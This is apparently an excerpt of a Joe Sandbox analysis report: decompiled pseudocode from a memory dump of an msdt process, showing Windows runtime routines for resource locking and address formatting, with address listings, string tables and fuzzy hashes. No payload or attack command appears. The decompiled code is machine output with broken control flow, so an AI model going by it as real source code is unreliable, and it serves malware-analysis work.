				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
									_push(_t144);
									_push(0);
									_t51 = E0258F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E025D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E025E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0261217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025E3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E025D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
												_push(_t138);
												_push(0);
												_t58 = E0258F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E025D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0261217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E025E3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E025D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E025B5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0258F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E025D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E025D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E025D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E025B5329(_t110, _t138);
																return E025B53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                                    0x025d055a
                                                                    0x025d055d
                                                                    0x025d0563
                                                                    0x025d0566
                                                                    0x025d05d8
                                                                    0x025d05e2
                                                                    0x025d05e5
                                                                    0x00000000
                                                                    0x025d05e7
                                                                    0x025d05e7
                                                                    0x025d05ea
                                                                    0x025d05f3
                                                                    0x025d05f3
                                                                    0x025d0568
                                                                    0x025d0568
                                                                    0x025d0568
                                                                    0x025d0569
                                                                    0x025d0569
                                                                    0x025d0569
                                                                    0x025d056b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f217f
                                                                    0x025f2183
                                                                    0x025f225b
                                                                    0x025f225f
                                                                    0x025f2189
                                                                    0x025f218c
                                                                    0x025f218f
                                                                    0x025f2194
                                                                    0x025f2199
                                                                    0x025f219d
                                                                    0x025f21a0
                                                                    0x025f21a2
                                                                    0x025f21ce
                                                                    0x025f21ce
                                                                    0x025f21ce
                                                                    0x025f21d0
                                                                    0x025f21d6
                                                                    0x025f21de
                                                                    0x025f21e2
                                                                    0x025f21e8
                                                                    0x025f21e9
                                                                    0x025f21ec
                                                                    0x025f21f1
                                                                    0x025f21f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f21f8
                                                                    0x025f21fb
                                                                    0x025f2206
                                                                    0x025f220b
                                                                    0x025f220c
                                                                    0x025f2217
                                                                    0x025f2226
                                                                    0x025f222b
                                                                    0x025f222c
                                                                    0x025f222f
                                                                    0x025f2232
                                                                    0x025f2235
                                                                    0x025f2235
                                                                    0x025f223a
                                                                    0x025f223f
                                                                    0x025f2241
                                                                    0x025f2243
                                                                    0x025f2248
                                                                    0x025f2248
                                                                    0x025f224d
                                                                    0x025f224f
                                                                    0x025f2262
                                                                    0x025f2263
                                                                    0x025f2268
                                                                    0x025f2269
                                                                    0x025f2269
                                                                    0x025f2269
                                                                    0x025f226d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f2276
                                                                    0x025f2279
                                                                    0x025f227e
                                                                    0x025f2283
                                                                    0x025f2287
                                                                    0x025f228a
                                                                    0x025f228d
                                                                    0x025f228f
                                                                    0x025f22bc
                                                                    0x025f22bc
                                                                    0x025f22bc
                                                                    0x025f22be
                                                                    0x025f22c4
                                                                    0x025f22cc
                                                                    0x025f22d0
                                                                    0x025f22d6
                                                                    0x025f22d7
                                                                    0x025f22da
                                                                    0x025f22df
                                                                    0x025f22e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22e6
                                                                    0x025f22e9
                                                                    0x025f22f4
                                                                    0x025f22f9
                                                                    0x025f22fa
                                                                    0x025f2305
                                                                    0x025f2314
                                                                    0x025f2319
                                                                    0x025f231a
                                                                    0x025f231d
                                                                    0x025f2320
                                                                    0x025f2323
                                                                    0x025f2323
                                                                    0x025f2328
                                                                    0x025f232d
                                                                    0x025f232f
                                                                    0x025f2331
                                                                    0x025f2336
                                                                    0x025f2336
                                                                    0x025f233b
                                                                    0x025f233d
                                                                    0x025f2350
                                                                    0x025f2351
                                                                    0x025f2356
                                                                    0x025f2359
                                                                    0x025f2359
                                                                    0x025f235b
                                                                    0x025f235d
                                                                    0x025b5367
                                                                    0x025b536b
                                                                    0x025b5372
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f2363
                                                                    0x025f2363
                                                                    0x025f2369
                                                                    0x025f236a
                                                                    0x025f236c
                                                                    0x025f2371
                                                                    0x025f2373
                                                                    0x00000000
                                                                    0x025f2379
                                                                    0x025f2379
                                                                    0x025f237a
                                                                    0x025f237f
                                                                    0x025f237f
                                                                    0x025f2385
                                                                    0x025f2386
                                                                    0x025f2389
                                                                    0x025f238e
                                                                    0x025f2390
                                                                    0x025b5378
                                                                    0x025b537c
                                                                    0x025f2396
                                                                    0x025f2396
                                                                    0x025f2397
                                                                    0x025f239c
                                                                    0x025f23a2
                                                                    0x025f23a3
                                                                    0x025f23a6
                                                                    0x025f23ab
                                                                    0x025f23ad
                                                                    0x00000000
                                                                    0x025f23b3
                                                                    0x025f23b3
                                                                    0x025f23b4
                                                                    0x025f23b9
                                                                    0x025f23ba
                                                                    0x025f23ba
                                                                    0x025f23bc
                                                                    0x025f23bf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e9153
                                                                    0x025e9158
                                                                    0x025e915a
                                                                    0x025e915e
                                                                    0x025e9160
                                                                    0x00000000
                                                                    0x025e9166
                                                                    0x025e9166
                                                                    0x025e9171
                                                                    0x025e9176
                                                                    0x025e9176
                                                                    0x00000000
                                                                    0x025e9160
                                                                    0x025f23c6
                                                                    0x025f23d7
                                                                    0x025f23d7
                                                                    0x025f23ad
                                                                    0x025f2390
                                                                    0x025f2373
                                                                    0x025f233f
                                                                    0x025f233f
                                                                    0x00000000
                                                                    0x025f233f
                                                                    0x025f2291
                                                                    0x025f2291
                                                                    0x025f2293
                                                                    0x025f2295
                                                                    0x025f229a
                                                                    0x025f22a1
                                                                    0x025f22a3
                                                                    0x025f22a7
                                                                    0x025f22a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22ab
                                                                    0x025f22ad
                                                                    0x025f22af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22af
                                                                    0x025f22b1
                                                                    0x025f22b4
                                                                    0x025f22b4
                                                                    0x025f22b6
                                                                    0x025b53be
                                                                    0x025b53be
                                                                    0x025b53be
                                                                    0x025b53c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025b53cb
                                                                    0x025b53ce
                                                                    0x025b53d0
                                                                    0x025b53d4
                                                                    0x025b53d6
                                                                    0x00000000
                                                                    0x025b53d8
                                                                    0x025b53e3
                                                                    0x025b53ea
                                                                    0x025b53ea
                                                                    0x00000000
                                                                    0x025b53d6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22b6
                                                                    0x00000000
                                                                    0x025f228f
                                                                    0x025f2349
                                                                    0x025f234d
                                                                    0x025f2251
                                                                    0x025f2251
                                                                    0x00000000
                                                                    0x025f2251
                                                                    0x025f21a4
                                                                    0x025f21a4
                                                                    0x025f21a6
                                                                    0x025f21a8
                                                                    0x025f21ac
                                                                    0x025f21b6
                                                                    0x025f21b8
                                                                    0x025f21bc
                                                                    0x025f21be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f21c0
                                                                    0x025f21c2
                                                                    0x025f21c4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f21c4
                                                                    0x025f21c6
                                                                    0x025f21c6
                                                                    0x025f21c8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f21c8
                                                                    0x025f21a2
                                                                    0x00000000
                                                                    0x025f2183
                                                                    0x025d057b
                                                                    0x025d057d
                                                                    0x025d0581
                                                                    0x025d0583
                                                                    0x025f2178
                                                                    0x00000000
                                                                    0x025d0589
                                                                    0x025d058f
                                                                    0x025d058f
                                                                    0x025d0583
                                                                    0x00000000

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F2206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-4236105082
                                                                    • Opcode ID: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                                                    • Instruction ID: e559f2022885c17d6733b422d06019f28312ce942c3b0d09baf0c36be4b6b020
                                                                    • Opcode Fuzzy Hash: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                                                    • Instruction Fuzzy Hash: A6514E717002026FEF54CE18CC81F6637AABFC4724F214259ED59DB284EA71EC418B9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025D14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E025D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2672088; // 0x762a3ac1
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E025C7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025D13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02592340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0259E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                    0x025d14c0
                                                                    0x025d14cb
                                                                    0x025d14d2
                                                                    0x025d14d6
                                                                    0x025d14da
                                                                    0x025d14de
                                                                    0x025d14e3
                                                                    0x025d157a
                                                                    0x025d157a
                                                                    0x025d14f1
                                                                    0x025d14f3
                                                                    0x025fea0f
                                                                    0x00000000
                                                                    0x025fea15
                                                                    0x00000000
                                                                    0x025fea15
                                                                    0x025d14f9
                                                                    0x025d14f9
                                                                    0x025d14fe
                                                                    0x025d1504
                                                                    0x025fea1a
                                                                    0x025fea1f
                                                                    0x025fea21
                                                                    0x025fea22
                                                                    0x025fea27
                                                                    0x025fea2a
                                                                    0x025fea2a
                                                                    0x025d1515
                                                                    0x025d1517
                                                                    0x025d156d
                                                                    0x025d1572
                                                                    0x025d1575
                                                                    0x025d1575
                                                                    0x025d151e
                                                                    0x025fea50
                                                                    0x025fea55
                                                                    0x025fea58
                                                                    0x025fea58
                                                                    0x025d152e
                                                                    0x025d1531
                                                                    0x025d1533
                                                                    0x00000000
                                                                    0x025d1535
                                                                    0x025d1541
                                                                    0x025d1549
                                                                    0x025d1549
                                                                    0x025d1533
                                                                    0x025d14f3
                                                                    0x025d1559

                                                                    APIs
                                                                    • ___swprintf_l.LIBCMT ref: 025FEA22
                                                                      • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D146B
                                                                      • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D1490
                                                                    • ___swprintf_l.LIBCMT ref: 025D156D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                                                    • Instruction ID: a9bc11d2ca549dc150ee0cb901926fcf7bdb088ca6e9439160f7912521eb5c13
                                                                    • Opcode Fuzzy Hash: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                                                    • Instruction Fuzzy Hash: B421E372900619ABDF30DE68CC41AEE77ACBB54300F448426ED4AD3100EB75AE58CFE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025B53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 44%
                                                                    			E025B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026701c0;
									_push(_t92);
									_push(0);
									_t37 = E0258F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E025D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0261217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E025D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E025B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0258F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E025D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E025D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E025D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E025B5329(_t74, _t92);
													_push(1);
													return E025B53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                                    0x025b53ab
                                                                    0x025b53ae
                                                                    0x025b53b1
                                                                    0x025b53b4
                                                                    0x025b53b7
                                                                    0x025d05b6
                                                                    0x025d05c0
                                                                    0x025d05c3
                                                                    0x00000000
                                                                    0x025d05c9
                                                                    0x025d05c9
                                                                    0x025d05cc
                                                                    0x025d05d5
                                                                    0x025d05d5
                                                                    0x025b53bd
                                                                    0x025b53bd
                                                                    0x025b53bd
                                                                    0x025b53be
                                                                    0x025b53be
                                                                    0x025b53be
                                                                    0x025b53c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f2269
                                                                    0x025f226d
                                                                    0x025f2349
                                                                    0x025f234d
                                                                    0x025f2273
                                                                    0x025f2276
                                                                    0x025f2279
                                                                    0x025f227e
                                                                    0x025f2283
                                                                    0x025f2287
                                                                    0x025f228a
                                                                    0x025f228d
                                                                    0x025f228f
                                                                    0x025f22bc
                                                                    0x025f22bc
                                                                    0x025f22bc
                                                                    0x025f22be
                                                                    0x025f22c4
                                                                    0x025f22cc
                                                                    0x025f22d0
                                                                    0x025f22d6
                                                                    0x025f22d7
                                                                    0x025f22da
                                                                    0x025f22df
                                                                    0x025f22e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22e6
                                                                    0x025f22e9
                                                                    0x025f22f4
                                                                    0x025f22f9
                                                                    0x025f22fa
                                                                    0x025f2305
                                                                    0x025f2314
                                                                    0x025f2319
                                                                    0x025f231a
                                                                    0x025f231d
                                                                    0x025f2320
                                                                    0x025f2323
                                                                    0x025f2323
                                                                    0x025f2328
                                                                    0x025f232d
                                                                    0x025f232f
                                                                    0x025f2331
                                                                    0x025f2336
                                                                    0x025f2336
                                                                    0x025f233b
                                                                    0x025f233d
                                                                    0x025f2350
                                                                    0x025f2351
                                                                    0x025f2356
                                                                    0x025f2359
                                                                    0x025f2359
                                                                    0x025f235b
                                                                    0x025f235d
                                                                    0x025b5367
                                                                    0x025b536b
                                                                    0x025b5372
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f2363
                                                                    0x025f2363
                                                                    0x025f2369
                                                                    0x025f236a
                                                                    0x025f236c
                                                                    0x025f2371
                                                                    0x025f2373
                                                                    0x00000000
                                                                    0x025f2379
